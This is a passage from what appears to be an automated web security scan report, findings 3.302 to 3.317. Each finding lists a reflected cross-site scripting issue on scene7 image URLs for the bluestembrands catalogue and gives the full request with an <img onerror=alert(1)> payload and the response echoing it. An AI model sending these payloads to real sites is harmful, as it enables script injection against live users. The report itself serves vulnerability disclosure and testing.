Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Fri, 30 Sep 2011 12:26:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:09 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/2A48A_400ab7ea<img src=a onerror=alert(1)>a50c18d4da6

3.302. http://s7d5.scene7.com/is/image/bluestembrands/4N9141VPM0010_A_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4N9141VPM0010_A_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 96fd6<img%20src%3da%20onerror%3dalert(1)>53234c08386 was submitted in the REST URL parameter 4. This input was echoed as 96fd6<img src=a onerror=alert(1)>53234c08386 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4N9141VPM0010_A_40096fd6<img%20src%3da%20onerror%3dalert(1)>53234c08386?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:24:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4N9141VPM0010_A_40096fd6<img src=a onerror=alert(1)>53234c08386

3.303. http://s7d5.scene7.com/is/image/bluestembrands/4NC4850000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NC4850000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 12c0f<img%20src%3da%20onerror%3dalert(1)>26393e8caae was submitted in the REST URL parameter 4. This input was echoed as 12c0f<img src=a onerror=alert(1)>26393e8caae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NC4850000010_A_99912c0f<img%20src%3da%20onerror%3dalert(1)>26393e8caae?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:10 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NC4850000010_A_99912c0f<img src=a onerror=alert(1)>26393e8caae

3.304. http://s7d5.scene7.com/is/image/bluestembrands/4NC4870000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NC4870000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82100<img%20src%3da%20onerror%3dalert(1)>7f0eeab06c9 was submitted in the REST URL parameter 4. This input was echoed as 82100<img src=a onerror=alert(1)>7f0eeab06c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NC4870000010_A_99982100<img%20src%3da%20onerror%3dalert(1)>7f0eeab06c9?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:10 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NC4870000010_A_99982100<img src=a onerror=alert(1)>7f0eeab06c9

3.305. http://s7d5.scene7.com/is/image/bluestembrands/4ND9630000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4ND9630000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bd65<img%20src%3da%20onerror%3dalert(1)>a4ac2cb2f1f was submitted in the REST URL parameter 4. This input was echoed as 3bd65<img src=a onerror=alert(1)>a4ac2cb2f1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4ND9630000010_A_9993bd65<img%20src%3da%20onerror%3dalert(1)>a4ac2cb2f1f?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:10 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4ND9630000010_A_9993bd65<img src=a onerror=alert(1)>a4ac2cb2f1f

3.306. http://s7d5.scene7.com/is/image/bluestembrands/4ND9760000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4ND9760000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 32bcd<img%20src%3da%20onerror%3dalert(1)>50d44c30387 was submitted in the REST URL parameter 4. This input was echoed as 32bcd<img src=a onerror=alert(1)>50d44c30387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4ND9760000010_A_99932bcd<img%20src%3da%20onerror%3dalert(1)>50d44c30387?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:09 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4ND9760000010_A_99932bcd<img src=a onerror=alert(1)>50d44c30387

3.307. http://s7d5.scene7.com/is/image/bluestembrands/4NF4230000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NF4230000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 656aa<img%20src%3da%20onerror%3dalert(1)>cb60ea3b9ca was submitted in the REST URL parameter 4. This input was echoed as 656aa<img src=a onerror=alert(1)>cb60ea3b9ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NF4230000010_A_999656aa<img%20src%3da%20onerror%3dalert(1)>cb60ea3b9ca?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:24:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:33 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NF4230000010_A_999656aa<img src=a onerror=alert(1)>cb60ea3b9ca

3.308. http://s7d5.scene7.com/is/image/bluestembrands/4NQ3530000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NQ3530000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9bc98<img%20src%3da%20onerror%3dalert(1)>524eba17d44 was submitted in the REST URL parameter 4. This input was echoed as 9bc98<img src=a onerror=alert(1)>524eba17d44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NQ3530000010_A_9999bc98<img%20src%3da%20onerror%3dalert(1)>524eba17d44?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:24:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:33 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NQ3530000010_A_9999bc98<img src=a onerror=alert(1)>524eba17d44

3.309. http://s7d5.scene7.com/is/image/bluestembrands/4NR7550000010_VB_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NR7550000010_VB_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78a16<img%20src%3da%20onerror%3dalert(1)>a975e107cec was submitted in the REST URL parameter 4. This input was echoed as 78a16<img src=a onerror=alert(1)>a975e107cec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NR7550000010_VB_99978a16<img%20src%3da%20onerror%3dalert(1)>a975e107cec?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Fri, 30 Sep 2011 12:26:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:11 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NR7550000010_VB_99978a16<img src=a onerror=alert(1)>a975e107cec

3.310. http://s7d5.scene7.com/is/image/bluestembrands/4NR7590000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NR7590000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca3cf<img%20src%3da%20onerror%3dalert(1)>1c211ad9899 was submitted in the REST URL parameter 4. This input was echoed as ca3cf<img src=a onerror=alert(1)>1c211ad9899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NR7590000010_A_999ca3cf<img%20src%3da%20onerror%3dalert(1)>1c211ad9899?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:10 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NR7590000010_A_999ca3cf<img src=a onerror=alert(1)>1c211ad9899

3.311. http://s7d5.scene7.com/is/image/bluestembrands/4NR7650000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NR7650000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 219b5<img%20src%3da%20onerror%3dalert(1)>2106a010781 was submitted in the REST URL parameter 4. This input was echoed as 219b5<img src=a onerror=alert(1)>2106a010781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NR7650000010_A_999219b5<img%20src%3da%20onerror%3dalert(1)>2106a010781?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:10 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NR7650000010_A_999219b5<img src=a onerror=alert(1)>2106a010781

3.312. http://s7d5.scene7.com/is/image/bluestembrands/4NS4490000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NS4490000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 66bc0<img%20src%3da%20onerror%3dalert(1)>988cc3be2c5 was submitted in the REST URL parameter 4. This input was echoed as 66bc0<img src=a onerror=alert(1)>988cc3be2c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NS4490000010_A_99966bc0<img%20src%3da%20onerror%3dalert(1)>988cc3be2c5?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:10 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NS4490000010_A_99966bc0<img src=a onerror=alert(1)>988cc3be2c5

3.313. http://s7d5.scene7.com/is/image/bluestembrands/4NS961NNUS055_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NS961NNUS055_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 20192<img%20src%3da%20onerror%3dalert(1)>eb12297c56f was submitted in the REST URL parameter 4. This input was echoed as 20192<img src=a onerror=alert(1)>eb12297c56f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NS961NNUS055_A_99920192<img%20src%3da%20onerror%3dalert(1)>eb12297c56f?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Fri, 30 Sep 2011 12:26:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NS961NNUS055_A_99920192<img src=a onerror=alert(1)>eb12297c56f

3.314. http://s7d5.scene7.com/is/image/bluestembrands/4NT0300000010_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NT0300000010_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f2acb<img%20src%3da%20onerror%3dalert(1)>49a8660ab72 was submitted in the REST URL parameter 4. This input was echoed as f2acb<img src=a onerror=alert(1)>49a8660ab72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NT0300000010_VA_999f2acb<img%20src%3da%20onerror%3dalert(1)>49a8660ab72?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Fri, 30 Sep 2011 12:24:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:24:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NT0300000010_VA_999f2acb<img src=a onerror=alert(1)>49a8660ab72

3.315. http://s7d5.scene7.com/is/image/bluestembrands/4NT3360000010_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NT3360000010_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e6e7a<img%20src%3da%20onerror%3dalert(1)>1f348ca0caf was submitted in the REST URL parameter 4. This input was echoed as e6e7a<img src=a onerror=alert(1)>1f348ca0caf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NT3360000010_WVA_999e6e7a<img%20src%3da%20onerror%3dalert(1)>1f348ca0caf?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 96
Expires: Fri, 30 Sep 2011 12:26:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:25 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NT3360000010_WVA_999e6e7a<img src=a onerror=alert(1)>1f348ca0caf

3.316. http://s7d5.scene7.com/is/image/bluestembrands/4NT3380000010_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NT3380000010_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f63ce<img%20src%3da%20onerror%3dalert(1)>e2b341d8488 was submitted in the REST URL parameter 4. This input was echoed as f63ce<img src=a onerror=alert(1)>e2b341d8488 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NT3380000010_WVA_999f63ce<img%20src%3da%20onerror%3dalert(1)>e2b341d8488?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 96
Expires: Fri, 30 Sep 2011 12:26:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NT3380000010_WVA_999f63ce<img src=a onerror=alert(1)>e2b341d8488

3.317. http://s7d5.scene7.com/is/image/bluestembrands/4NV962NBRS055_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NV962NBRS055_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a29d<img%20src%3da%20onerror%3dalert(1)>a56e65f57ee was submitted in the REST URL parameter 4. This input was echoed as 3a29d<img src=a onerror=alert(1)>a56e65f57ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NV962NBRS055_A_9993a29d<img%20src%3da%20onerror%3dalert(1)>a56e65f57ee?$Shoppingcart$ HTTP/1.1
